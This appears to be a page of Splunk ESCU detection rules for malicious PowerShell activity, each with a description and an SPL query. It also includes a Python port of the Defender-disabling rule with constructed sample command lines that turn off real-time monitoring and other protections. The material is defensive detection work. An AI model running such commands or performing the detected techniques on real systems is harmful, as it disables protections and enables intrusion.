The following analytic detects the use of .NET classes in PowerShell to download a URL payload directly into memory, a common fileless malware staging technique. It leverages PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell commands involving `system.net.webclient`, `system.net.webrequest`, and `IO.MemoryStream`. This activity is significant as it indicates potential fileless malware execution, which is harder to detect and can bypass traditional file-based defenses. If confirmed malicious, this technique could allow attackers to execute code in memory, evade detection, and maintain persistence in the environment.
Show query
`powershell` EventCode=4104  ScriptBlockText IN ("*system.net.webclient*","*system.net.webrequest*") AND ScriptBlockText="*IO.MemoryStream*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_webrequest_using_memory_stream_filter`
Splunk ESCU SPL T1059.001, T1546.015 ↗
Powershell COM Hijacking InprocServer32 Modification
The following analytic detects attempts to modify or add a Component Object Model (COM) entry to the InProcServer32 path within the registry using PowerShell. It leverages PowerShell ScriptBlock Logging (EventCode 4104) to identify suspicious script blocks that target the InProcServer32 registry path. This activity is significant because modifying COM objects can be used for persistence or privilege escalation by attackers. If confirmed malicious, this could allow an attacker to execute arbitrary code or maintain persistent access to the compromised system, posing a severe security risk.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*Software\\Classes\\CLSID\\*\\InProcServer32*" | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id user_id vendor_product EventID Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_com_hijacking_inprocserver32_modification_filter`
Splunk ESCU SPL T1027.005, T1059.001 ↗
Powershell Creating Thread Mutex
The following analytic detects PowerShell scripts that reference the .NET `System.Threading.Mutex` class, via EventCode 4104. This detection leverages PowerShell Script Block Logging to identify scripts that create a mutex, a technique often used in obfuscated scripts and malware to ensure only one instance runs on a compromised machine. This activity is significant as it may indicate the presence of sophisticated malware or persistence mechanisms. If confirmed malicious, the attacker could maintain exclusive control over a process, potentially leading to further exploitation or persistence within the environment.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*Threading.Mutex*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_creating_thread_mutex_filter`
Splunk ESCU SPL T1562.001 ↗
Powershell Disable Security Monitoring
The following analytic identifies attempts to disable Windows Defender protections, such as real-time and behavior monitoring, via PowerShell commands. It detects the use of specific `Set-MpPreference` parameters (and their short aliases) that disable security features, as well as setting `PUAProtection` to disabled or lowering `CloudBlockLevel`. Because it runs over process creation command lines from EDR data rather than script block logs, the cmdlet and its arguments must appear on the powershell.exe command line itself. This activity is significant as it is commonly used by malware such as RATs, bots, or Trojans to evade detection by disabling antivirus protections. If confirmed malicious, this action could allow an attacker to operate undetected, leading to potential data exfiltration, further system compromise, or persistent access within the environment.
Show query
| tstats `security_content_summariesonly`
  count min(_time) as firstTime
        max(_time) as lastTime
from datamodel=Endpoint.Processes where
`process_powershell`
Processes.process="*Set-MpPreference*"
(
  Processes.process IN (
    "*DisableArchiveScanning*",
    "*DisableBehaviorMonitoring*",
    "*DisableBlockAtFirstSeen*",
    "*DisableCatchupFullScan*",
    "*DisableCatchupQuickScan*",
    "*DisableIOAVProtection*",
    "*DisableRealtimeMonitoring*",
    "*DisableRemovableDriveScanning*",
    "*DisableRestorePoint*",
    "*DisableScanningMappedNetworkDrivesForFullScan*",
    "*DisableScanningNetworkFiles*",
    "*DisableScriptScanning*",
    "*drdsc*",
    "*dsnf *",
    "*drtm *",
    "*dioavp *",
    "*dscrptsc *",
    "*dbaf *",
    "*darchsc *",
    "*dcfsc *",
    "*dbm *"
  )
  Processes.process IN (
    "* $true*",
    "* 1*"
  )
)
OR
(
  Processes.process = "*PUAProtection*"
  Processes.process = "*disable*"
)
OR
(
  Processes.process = "*CloudBlockLevel*"
  Processes.process IN (
    "* $false*",
    "* 0*"
  )
)
by Processes.action Processes.dest Processes.original_file_name Processes.parent_process
   Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id
   Processes.parent_process_name Processes.parent_process_path Processes.process Processes.process_exec
   Processes.process_guid Processes.process_hash Processes.process_id Processes.process_integrity_level
   Processes.process_name Processes.process_path Processes.user Processes.user_id Processes.vendor_product

| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_disable_security_monitoring_filter`
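The query's three branches (a disabling switch with `$true`/`1`, `PUAProtection` set to disabled, `CloudBlockLevel` set to `$false`/`0`) are easy to read but rely on wildcards such as `"* $true*"` that need a space before the value. The following Python port is an added example, not ESCU code: it parses `-Param value` pairs instead, which also covers the `-Param:value` form that the wildcards miss. The switch list is copied from the query; the command lines are constructed for illustration.

```python
import re

# Set-MpPreference switches (long names and the short aliases the detection
# also lists) that weaken Defender when set to $true / 1. Copied from the query.
DISABLE_SWITCHES = {s.lower() for s in (
    "DisableArchiveScanning", "DisableBehaviorMonitoring", "DisableBlockAtFirstSeen",
    "DisableCatchupFullScan", "DisableCatchupQuickScan", "DisableIOAVProtection",
    "DisableRealtimeMonitoring", "DisableRemovableDriveScanning", "DisableRestorePoint",
    "DisableScanningMappedNetworkDrivesForFullScan", "DisableScanningNetworkFiles",
    "DisableScriptScanning",
    "drdsc", "dsnf", "drtm", "dioavp", "dscrptsc", "dbaf", "darchsc", "dcfsc", "dbm",
)}

# A parameter token: "-Name" at a token boundary, followed by ":value" or by a
# whitespace-separated value that is not itself another switch.
PARAM_RE = re.compile(
    r"(?<!\S)-(?P<name>[A-Za-z]+)(?::(?P<joined>\S+)|\s+(?P<next>[^\s-]\S*))?")


def defender_weakening(cmdline: str) -> list[str]:
    """Return 'Param=value' for every Defender-weakening argument on the
    command line, or [] if Set-MpPreference is not invoked at all."""
    if not re.search(r"set-mppreference", cmdline, re.IGNORECASE):
        return []
    findings = []
    for m in PARAM_RE.finditer(cmdline):
        name = m.group("name")
        value = (m.group("joined") or m.group("next") or "").strip("'\"").lower()
        key = name.lower()
        if key in DISABLE_SWITCHES and value in ("$true", "1"):
            findings.append(f"{name}={value}")
        elif key == "puaprotection" and value.startswith("disable"):
            findings.append(f"{name}={value}")
        elif key == "cloudblocklevel" and value in ("$false", "0"):
            findings.append(f"{name}={value}")
    return findings


# Constructed command lines (not real telemetry).
CMD_HIDDEN = ('powershell.exe -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true '
              '-DisableIOAVProtection $true"')
# Alias plus colon syntax: no space before $true, so the query's wildcard misses it.
CMD_ALIAS_COLON = "powershell.exe Set-MpPreference -drtm:$true"
CMD_PUA_CLOUD = "powershell.exe -c Set-MpPreference -PUAProtection Disabled -CloudBlockLevel 0"
# Re-enabling real-time monitoring and a scheduling change: nothing to flag.
CMD_BENIGN = "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false -ScanScheduleDay 0"
# Reads the preference without changing it.
CMD_READ_ONLY = "powershell.exe Get-MpPreference | Select-Object DisableRealtimeMonitoring"
```

Two gaps remain in both the query and this port: PowerShell accepts any unambiguous prefix of a parameter name (for example `-DisableRealtime` for `-DisableRealtimeMonitoring`), and neither matches on that; and an operator who writes the cmdlet into a script file and runs the file keeps the arguments off the command line, which is why pairing this rule with the 4104-based detections on this page is worthwhile.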
Splunk ESCU SPL T1027.005 ↗
Powershell Enable SMB1Protocol Feature
The following analytic detects the enabling of the SMB1 protocol via `powershell.exe`. It leverages PowerShell script block logging (EventCode 4104) to identify the execution of the `Enable-WindowsOptionalFeature` cmdlet with the `SMB1Protocol` parameter. This activity is significant because enabling SMB1 can facilitate lateral movement and file encryption by ransomware, such as RedDot. If confirmed malicious, this action could allow an attacker to propagate through the network, encrypt files, and potentially disrupt business operations.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*Enable-WindowsOptionalFeature*" ScriptBlockText = "*SMB1Protocol*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_enable_smb1protocol_feature_filter`
Splunk ESCU SPL T1059.001, T1546.015 ↗
Powershell Execute COM Object
The following analytic detects the execution of a COM CLSID through PowerShell. It leverages EventCode 4104 and searches for specific script block text indicating the creation of a COM object. This activity is significant as it is commonly used by adversaries and malware, such as the Conti ransomware, to execute commands, potentially for privilege escalation or bypassing User Account Control (UAC). If confirmed malicious, this technique could allow attackers to gain elevated privileges or persist within the environment, posing a significant security risk.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*CreateInstance([type]::GetTypeFromCLSID*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_execute_com_object_filter`
Splunk ESCU SPL T1055, T1059.001 ↗
Powershell Fileless Process Injection via GetProcAddress
The following analytic detects the use of `GetProcAddress` in PowerShell script blocks, leveraging PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, which is then logged in Windows event logs. The presence of `GetProcAddress` is unusual for typical PowerShell scripts and often indicates malicious activity, as many attack toolkits use it to achieve code execution. If confirmed malicious, this activity could allow an attacker to execute arbitrary code, potentially leading to system compromise. Analysts should review parallel processes and the entire logged script block for further investigation.
Show query
`powershell` EventCode=4104 ScriptBlockText=*getprocaddress*
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_fileless_process_injection_via_getprocaddress_filter`
Splunk ESCU SPL T1027, T1059.001 ↗
Powershell Fileless Script Contains Base64 Encoded Content
The following analytic detects the execution of PowerShell scripts containing Base64 encoded content, specifically identifying the use of `FromBase64String`. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as Base64 encoding is often used by attackers to obfuscate malicious payloads, making it harder to detect. If confirmed malicious, this could lead to code execution, allowing attackers to run arbitrary commands and potentially compromise the system.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*frombase64string*" OR ScriptBlockText = "*gnirtS46esaBmorF*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_fileless_script_contains_base64_encoded_content_filter`
Splunk ESCU SPL T1069.001 ↗
Powershell Get LocalGroup Discovery with Script Block Logging
The following analytic detects the execution of the PowerShell cmdlet `get-localgroup` using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, providing detailed visibility into script execution. Monitoring this activity is significant as it can indicate an attempt to enumerate local groups, which may be a precursor to privilege escalation or lateral movement. If confirmed malicious, an attacker could gain insights into group memberships, potentially leading to unauthorized access or privilege abuse. Review parallel processes and the entire script block for comprehensive analysis.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*get-localgroup*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_get_localgroup_discovery_with_script_block_logging_filter`
Splunk ESCU SPL T1059.001 ↗
Powershell Load Module in Meterpreter
The following analytic detects the execution of suspicious PowerShell commands associated with Meterpreter modules, such as "MSF.Powershell" and "MSF.Powershell.Meterpreter". It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as it indicates potential post-exploitation actions, including credential dumping and persistence mechanisms. If confirmed malicious, an attacker could gain extensive control over the compromised system, escalate privileges, and maintain long-term access, posing a severe threat to the environment.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*MSF.Powershell*","*MSF.Powershell.Meterpreter*","*MSF.Powershell.Meterpreter.Kiwi*","*MSF.Powershell.Meterpreter.Transport*")
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_load_module_in_meterpreter_filter`
Splunk ESCU SPL T1059.001 ↗
Powershell Processing Stream Of Data
The following analytic detects suspicious PowerShell script execution involving compressed stream data processing, identified via EventCode 4104. It leverages PowerShell Script Block Logging to flag scripts using `IO.Compression`, `IO.StreamReader`, or decompression methods. This activity is significant as it often indicates obfuscated PowerShell or embedded .NET/binary execution, which are common tactics for evading detection. If confirmed malicious, this behavior could allow attackers to execute hidden code, escalate privileges, or maintain persistence within the environment.
Show query
`powershell` EventCode=4104 ScriptBlockText = "*IO.Compression.*" OR ScriptBlockText = "*IO.StreamReader*" OR ScriptBlockText = "*]::Decompress*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_processing_stream_of_data_filter`
Splunk ESCU SPL T1021.006 ↗
Powershell Remote Services Add TrustedHost
The following analytic detects the execution of a PowerShell script that modifies the 'TrustedHosts' configuration via EventCode 4104. It leverages PowerShell Script Block Logging to identify commands targeting WSMan settings, specifically those altering or concatenating trusted hosts. This activity is significant as it can indicate attempts to manipulate remote connection settings, potentially allowing unauthorized remote access. If confirmed malicious, this could enable attackers to establish persistent remote connections, bypass security protocols, and gain unauthorized access to sensitive systems and data.
Show query
`powershell` EventCode=4104  ScriptBlockText = "*WSMan:\\localhost\\Client\\TrustedHosts*" ScriptBlockText IN ("* -Value *", "* -Concatenate *") | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id user_id vendor_product EventID Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remote_services_add_trustedhost_filter`
Splunk ESCU SPL T1055 ↗
Powershell Remote Thread To Known Windows Process
The following analytic detects suspicious PowerShell processes attempting to inject code into critical Windows processes using CreateRemoteThread. It leverages Sysmon EventCode 8 to identify instances where PowerShell spawns threads in processes like svchost.exe, csrss.exe, and others. This activity is significant as it is commonly used by malware such as TrickBot and offensive tools like Cobalt Strike to execute malicious payloads, establish reverse shells, or download additional malware. If confirmed malicious, this behavior could lead to unauthorized code execution, privilege escalation, and persistent access within the environment.
Show query
`sysmon` EventCode = 8 parent_process_name IN ("powershell_ise.exe", "powershell.exe") TargetImage IN ("*\\svchost.exe","*\\csrss.exe","*\\gpupdate.exe","*\\explorer.exe","*\\services.exe","*\\winlogon.exe","*\\smss.exe","*\\wininit.exe","*\\userinit.exe","*\\spoolsv.exe","*\\taskhost.exe") | stats count min(_time) as firstTime max(_time) as lastTime by EventID Guid NewThreadId ProcessID SecurityID SourceImage SourceProcessGuid SourceProcessId StartAddress StartFunction StartModule TargetImage TargetProcessGuid TargetProcessId UserID dest parent_process_exec parent_process_guid parent_process_id parent_process_name parent_process_path process_exec process_guid process_id process_name process_path signature signature_id user_id vendor_product | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remote_thread_to_known_windows_process_filter`
Showing 1051-1100 of 2,101